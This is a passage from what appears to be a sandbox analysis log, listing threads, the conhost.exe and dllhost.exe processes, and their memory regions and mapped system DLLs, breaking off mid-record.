	[0058.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.529] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.530] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0060.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0060.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) 

Thread:
	id = 41
	os_tid = 0x624


Thread:
	id = 42
	os_tid = 0xdbc


Thread:
	id = 45
	os_tid = 0x7f0


Process:
	id = "4"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x3b9d4000"
	os_pid = "0x628"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0xff8"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 342
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 343
	        start_va = 0xaaf52a0000
	          end_va = 0xaaf52dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaf52a0000"
	        filename = ""

Region:
	              id = 344
	        start_va = 0xaaf5400000
	          end_va = 0xaaf55fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaf5400000"
	        filename = ""

Region:
	              id = 345
	        start_va = 0x25c1dac0000
	          end_va = 0x25c1dadffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1dac0000"
	        filename = ""

Region:
	              id = 346
	        start_va = 0x25c1dae0000
	          end_va = 0x25c1daf4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1dae0000"
	        filename = ""

Region:
	              id = 347
	        start_va = 0x7df5ff4a0000
	          end_va = 0x7ff5ff49ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff4a0000"
	        filename = ""

Region:
	              id = 348
	        start_va = 0x7ff6b69f0000
	          end_va = 0x7ff6b6a12fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b69f0000"
	        filename = ""

Region:
	              id = 349
	        start_va = 0x7ff6b7050000
	          end_va = 0x7ff6b7060fff
	     entry_point = 0x7ff6b7050000
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 350
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 351
	        start_va = 0x25c1db60000
	          end_va = 0x25c1dc5ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1db60000"
	        filename = ""

Region:
	              id = 352
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 353
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 354
	        start_va = 0xaaf52e0000
	          end_va = 0xaaf531ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaf52e0000"
	        filename = ""

Region:
	              id = 355
	        start_va = 0x25c1dac0000
	          end_va = 0x25c1dacffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1dac0000"
	        filename = ""

Region:
	              id = 356
	        start_va = 0x25c1dc60000
	          end_va = 0x25c1dd1dfff
	     entry_point = 0x25c1dc60000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 357
	        start_va = 0x7ff6b68f0000
	          end_va = 0x7ff6b69effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff6b68f0000"
	        filename = ""

Region:
	              id = 358
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 359
	        start_va = 0x25c1dad0000
	          end_va = 0x25c1dad6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1dad0000"
	        filename = ""

Region:
	              id = 360
	        start_va = 0x25c1db00000
	          end_va = 0x25c1db00fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1db00000"
	        filename = ""

Region:
	              id = 361
	        start_va = 0x25c1db10000
	          end_va = 0x25c1db16fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1db10000"
	        filename = ""

Region:
	              id = 362
	        start_va = 0x25c1df10000
	          end_va = 0x25c1df1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1df10000"
	        filename = ""

Region:
	              id = 363
	        start_va = 0x7ffc02060000
	          end_va = 0x7ffc020b8fff
	     entry_point = 0x7ffc02060000
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 364
	        start_va = 0x7ffc101d0000
	          end_va = 0x7ffc10355fff
	     entry_point = 0x7ffc101d0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 365
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 366
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 367
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 368
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 369
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 370
	        start_va = 0x7ffc14bb0000
	          end_va = 0x7ffc14cf2fff
	     entry_point = 0x7ffc14bb0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 371
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 372
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 373
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 374
	        start_va = 0xaaf5320000
	          end_va = 0xaaf535ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaf5320000"
	        filename = ""

Region:
	              id = 375
	        start_va = 0x25c1db20000
	          end_va = 0x25c1db20fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1db20000"
	        filename = ""

Region:
	              id = 376
	        start_va = 0x25c1db30000
	          end_va = 0x25c1db30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1db30000"
	        filename = ""

Region:
	              id = 377
	        start_va = 0x25c1dd20000
	          end_va = 0x25c1dea7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1dd20000"
	        filename = ""

Region:
	              id = 378
	        start_va = 0x25c1df20000
	          end_va = 0x25c1e0a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1df20000"
	        filename = ""

Region:
	              id = 379
	        start_va = 0x25c1e0b0000
	          end_va = 0x25c1f4affff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1e0b0000"
	        filename = ""

Region:
	              id = 380
	        start_va = 0x25c1f690000
	          end_va = 0x25c1f69ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1f690000"
	        filename = ""

Region:
	              id = 381
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 382
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 383
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 384
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 385
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 386
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 387
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 388
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 389
	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 390
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 391
	        start_va = 0xaaf5360000
	          end_va = 0xaaf539ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000aaf5360000"
	        filename = ""

Region:
	              id = 392
	        start_va = 0x25c1f5a0000
	          end_va = 0x25c1f5affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1f5a0000"
	        filename = ""

Region:
	              id = 393
	        start_va = 0x25c1f6a0000
	          end_va = 0x25c1f9d6fff
	     entry_point = 0x25c1f6a0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 394
	        start_va = 0x25c1f9e0000
	          end_va = 0x25c1fadffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1f9e0000"
	        filename = ""

Region:
	              id = 395
	        start_va = 0x25c1fae0000
	          end_va = 0x25c1fcdffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1fae0000"
	        filename = ""

Region:
	              id = 396
	        start_va = 0x7ffc12ae0000
	          end_va = 0x7ffc12c39fff
	     entry_point = 0x7ffc12ae0000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 397
	        start_va = 0x25c1db40000
	          end_va = 0x25c1db43fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1db40000"
	        filename = ""

Region:
	              id = 398
	        start_va = 0x25c1f4b0000
	          end_va = 0x25c1f56bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1f4b0000"
	        filename = ""

Region:
	              id = 399
	        start_va = 0x7ffc0fcd0000
	          end_va = 0x7ffc0fcf1fff
	     entry_point = 0x7ffc0fcd0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 400
	        start_va = 0x7ffc103c0000
	          end_va = 0x7ffc103d2fff
	     entry_point = 0x7ffc103c0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 401
	        start_va = 0x7ffc11a60000
	          end_va = 0x7ffc11ab5fff
	     entry_point = 0x7ffc11a60000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 402
	        start_va = 0x25c1db50000
	          end_va = 0x25c1db56fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025c1db50000"
	        filename = ""

Region:
	              id = 403
	        start_va = 0x25c1deb0000
	          end_va = 0x25c1deb0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1deb0000"
	        filename = ""

Region:
	              id = 404
	        start_va = 0x25c1dec0000
	          end_va = 0x25c1dec0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1dec0000"
	        filename = ""

Region:
	              id = 405
	        start_va = 0x25c1ded0000
	          end_va = 0x25c1ded1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1ded0000"
	        filename = ""

Region:
	              id = 406
	        start_va = 0x25c1dee0000
	          end_va = 0x25c1dee0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1dee0000"
	        filename = ""

Region:
	              id = 407
	        start_va = 0x25c1def0000
	          end_va = 0x25c1def0fff
	     entry_point = 0x25c1def0000
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 408
	        start_va = 0x25c1df00000
	          end_va = 0x25c1df01fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1df00000"
	        filename = ""

Region:
	              id = 409
	        start_va = 0x25c1f5b0000
	          end_va = 0x25c1f63bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025c1f5b0000"
	        filename = ""

Region:
	              id = 410
	        start_va = 0x7ffc08b50000
	          end_va = 0x7ffc08dc3fff
	     entry_point = 0x7ffc08b50000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")


Thread:
	id = 15
	os_tid = 0x55c


Thread:
	id = 16
	os_tid = 0xe04


Thread:
	id = 17
	os_tid = 0xe00


Thread:
	id = 18
	os_tid = 0x638


Process:
	id = "5"
	image_name = "dllhost.exe"
	filename = "c:\\windows\\system32\\dllhost.exe"
	page_root = "0x24e31000"
	os_pid = "0xae0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "rpc_server"
	parent_id = "3"
	os_parent_pid = "0xff8"
	cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 660
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 661
	        start_va = 0xdeb4ea0000
	          end_va = 0xdeb4f9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb4ea0000"
	        filename = ""

Region:
	              id = 662
	        start_va = 0xdeb5000000
	          end_va = 0xdeb51fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5000000"
	        filename = ""

Region:
	              id = 663
	        start_va = 0xdeb5300000
	          end_va = 0xdeb53fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5300000"
	        filename = ""

Region:
	              id = 664
	        start_va = 0xdeb5400000
	          end_va = 0xdeb54fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5400000"
	        filename = ""

Region:
	              id = 665
	        start_va = 0xdeb5600000
	          end_va = 0xdeb56fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5600000"
	        filename = ""

Region:
	              id = 666
	        start_va = 0xdeb5800000
	          end_va = 0xdeb58fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5800000"
	        filename = ""

Region:
	              id = 667
	        start_va = 0xdeb5900000
	          end_va = 0xdeb59fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5900000"
	        filename = ""

Region:
	              id = 668
	        start_va = 0xdeb5a00000
	          end_va = 0xdeb5afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000deb5a00000"
	        filename = ""

Region:
	              id = 669
	        start_va = 0x27980000000
	          end_va = 0x27980006fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980000000"
	        filename = ""

Region:
	              id = 670
	        start_va = 0x27980010000
	          end_va = 0x27980010fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027980010000"
	        filename = ""

Region:
	              id = 671
	        start_va = 0x27980020000
	          end_va = 0x27980026fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980020000"
	        filename = ""

Region:
	              id = 672
	        start_va = 0x27980030000
	          end_va = 0x27980030fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027980030000"
	        filename = ""

Region:
	              id = 673
	        start_va = 0x27980040000
	          end_va = 0x27980040fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980040000"
	        filename = ""

Region:
	              id = 674
	        start_va = 0x27980050000
	          end_va = 0x27980050fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980050000"
	        filename = ""

Region:
	              id = 675
	        start_va = 0x27980060000
	          end_va = 0x27980060fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027980060000"
	        filename = ""

Region:
	              id = 676
	        start_va = 0x27980070000
	          end_va = 0x27980070fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980070000"
	        filename = ""

Region:
	              id = 677
	        start_va = 0x27980080000
	          end_va = 0x27980080fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980080000"
	        filename = ""

Region:
	              id = 678
	        start_va = 0x27980090000
	          end_va = 0x2798009ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027980090000"
	        filename = ""

Region:
	              id = 679
	        start_va = 0x279800a0000
	          end_va = 0x279800affff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279800a0000"
	        filename = ""

Region:
	              id = 680
	        start_va = 0x279800b0000
	          end_va = 0x279800bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279800b0000"
	        filename = ""

Region:
	              id = 681
	        start_va = 0x279800c0000
	          end_va = 0x279800cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279800c0000"
	        filename = ""

Region:
	              id = 682
	        start_va = 0x279800d0000
	          end_va = 0x279800dffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279800d0000"
	        filename = ""

Region:
	              id = 683
	        start_va = 0x279800e0000
	          end_va = 0x279800effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279800e0000"
	        filename = ""

Region:
	              id = 684
	        start_va = 0x279800f0000
	          end_va = 0x279800f7fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000279800f0000"
	        filename = ""

Region:
	              id = 685
	        start_va = 0x27980100000
	          end_va = 0x27980100fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980100000"
	        filename = ""

Region:
	              id = 686
	        start_va = 0x27980110000
	          end_va = 0x27980110fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980110000"
	        filename = ""

Region:
	              id = 687
	        start_va = 0x27980120000
	          end_va = 0x27980123fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980120000"
	        filename = ""

Region:
	              id = 688
	        start_va = 0x27980130000
	          end_va = 0x27980131fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980130000"
	        filename = ""

Region:
	              id = 689
	        start_va = 0x27980140000
	          end_va = 0x2798014ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980140000"
	        filename = ""

Region:
	              id = 690
	        start_va = 0x27980150000
	          end_va = 0x27980150fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980150000"
	        filename = ""

Region:
	              id = 691
	        start_va = 0x27980160000
	          end_va = 0x27980167fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980160000"
	        filename = ""

Region:
	              id = 692
	        start_va = 0x27980170000
	          end_va = 0x27980171fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027980170000"
	        filename = ""

Region:
	              id = 693
	        start_va = 0x27980190000
	          end_va = 0x2798019ffff
	     entry_point = 0x27980190000
	     region_type = mapped_file
	            name = "webcachev01.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")

Region:
	              id = 694
	        start_va = 0x279801a0000
	          end_va = 0x279801affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000279801a0000"
	        filename = ""

Region:
	              id = 695
	        start_va = 0x279801b0000
	          end_va = 0x27980337fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279801b0000"
	        filename = ""

Region:
	              id = 696
	        start_va = 0x27980340000
	          end_va = 0x279804c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027980340000"
	        filename = ""

Region:
	              id = 697
	        start_va = 0x279804d0000
	          end_va = 0x279818cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000279804d0000"
	        filename = ""

Region:
	              id = 698
	        start_va = 0x279818d0000
	          end_va = 0x27981c06fff
	     entry_point = 0x279818d0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 699
	        start_va = 0x27981c10000
	          end_va = 0x27981d0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027981c10000"
	        filename = ""

Region:
	              id = 700
	        start_va = 0x27981d10000
	          end_va = 0x27981d1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d10000"
	        filename = ""

Region:
	              id = 701
	        start_va = 0x27981d20000
	          end_va = 0x27981d2ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d20000"
	        filename = ""

Region:
	              id = 702
	        start_va = 0x27981d30000
	          end_va = 0x27981d3ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d30000"
	        filename = ""

Region:
	              id = 703
	        start_va = 0x27981d40000
	          end_va = 0x27981d4ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d40000"
	        filename = ""

Region:
	              id = 704
	        start_va = 0x27981d50000
	          end_va = 0x27981d5ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d50000"
	        filename = ""

Region:
	              id = 705
	        start_va = 0x27981d60000
	          end_va = 0x27981d6ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000027981d60000"
	        filename = ""

Region:
	              id = 706
	        start_va = 0x27981d70000
	          end_va = 0x27982d6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027981d70000"
	        filename = ""

Region:
	              id = 707
	        start_va = 0x27982d70000
	          end_va = 0x27982dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027982d70000"
	        filename = ""

Region:
	              id = 708
	        start_va = 0x27982e00000
	          end_va = 0x27982efffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000027982e00000"
	        filename = ""

Region:
	              id = 709
	        start_va = 0x27982f00000
	          end_va = 0x27982f0ffff
	     entry_point = 0x27982f00000
	     region_type = mapped_file
	            name = "webcachev01.dat"
